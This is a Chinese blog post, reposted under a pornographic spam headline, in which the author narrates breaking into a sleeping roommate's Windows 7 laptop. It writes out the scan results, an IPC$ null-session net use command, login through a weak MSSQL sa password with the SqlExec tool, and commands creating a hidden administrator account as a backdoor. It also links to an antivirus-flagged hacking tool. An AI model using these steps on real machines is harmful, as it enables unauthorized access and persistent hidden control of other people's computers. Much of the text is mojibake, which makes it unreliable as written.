亚洲日本免费-啊轻点灬太粗太长了三男一女-麻豆av电影在线观看-日韩一级片毛片|www.grbbt.com

　　環(huán)境：都是Win7

　　最近室友的本本老是出問(wèn)題，他懷疑是黑客入侵，因?yàn)槟喑鰝€(gè)管理員賬戶（雖然沒登錄過(guò)），以及最近PC的內(nèi)存使用率莫名上漲（本就2G。。）

　　PS：雖然我不認(rèn)為他這電腦有什么好東西要黑的- –

　　用netstat -an查看了下他的愛機(jī)打開的端口。馬丹3389啊什么的都在開著，我呵呵。。你就算是學(xué)霸也不能這樣任性啊。然后把這些端口都關(guān)了，最后決定掃一下他的電腦~

　　掃描

　　掃描之后得到下面結(jié)果：

　　[172.16.138.178]： 主機(jī)名稱： "XXX-pc"

　　[172.16.138.178]： 發(fā)現(xiàn)  "端口： 135/epmap" ！??！

　　[172.16.138.178]： 發(fā)現(xiàn)  "端口： 139/netbios-ssn" ！??！

　　[172.16.138.178]： 發(fā)現(xiàn)  "端口： 445/microsoft-ds" ！?。?/p>

　　[172.16.138.178]： 發(fā)現(xiàn)  "端口： 1433/ms-sql-s" ?。?！

　　[172.16.138.178]： IPC NULL session connection success ?。。?/p>

　　[172.16.138.178]： 發(fā)現(xiàn)  "MSSQL account： sa/123" ！??！

　　ipc$空連接嘗試

　　空連接在開著呢，也有139/445，連上試試：

　　C：UsersAdministrator>net use \172.16.138.178ipc$ "" /user：""

　　命令成功完成。

　　OK，可以連上，映射一下試試：

　　C：UsersAdministrator>net use z： \172.16.138.178c$ "" /user：""

　　發(fā)生系統(tǒng)錯(cuò)誤 5。

　　拒絕訪問(wèn)。

　　好吧，權(quán)限不夠，剛才掃描也沒掃到管理員的弱口令，看來(lái)這個(gè)管理員權(quán)限是得不到了，換個(gè)方向吧。

　　MSSQL連接

　　剛剛還掃描到了MSSQL的sa權(quán)限的弱口令，嘖嘖，我只能說(shuō)no zuo no die，一個(gè)系統(tǒng)只要有一個(gè)破綻，你就完了。。

　　沒安裝MSSQL，就下載一個(gè)MSSQL簡(jiǎn)易遠(yuǎn)程連接以及操作工具——SqlExec，連接界面如下：

　　ok，連接成功，我們可以執(zhí)行任何cmd命令了。

　　創(chuàng)建隱藏賬戶：

　　net user zero$ 123 /add

　　net localgroup administrators zero$ /add

　　這樣就獲得了一個(gè)管理員權(quán)限的隱藏賬戶，在cmd下用net user是看不見的，除非進(jìn)入控制面板下的“用戶和賬戶”。

　　這樣就全部ok了，總算實(shí)現(xiàn)了入侵一次室友電腦的偉大目（can）標(biāo)（nian），等他醒了讓他把弱口令改了吧。。

　　PS：第一次入侵（Web不算），記錄下來(lái)留個(gè)紀(jì)念。

　　附上一些資料：

　　經(jīng)典的ipc$入侵：http：//www.xfocus.net/articles/200303/493.html

　　SqlExec（報(bào)毒，可用）：http：//down.51cto.com/data/85369

　　文章來(lái)源：http：//zero4eva.blog.51cto.com/7558298/1591983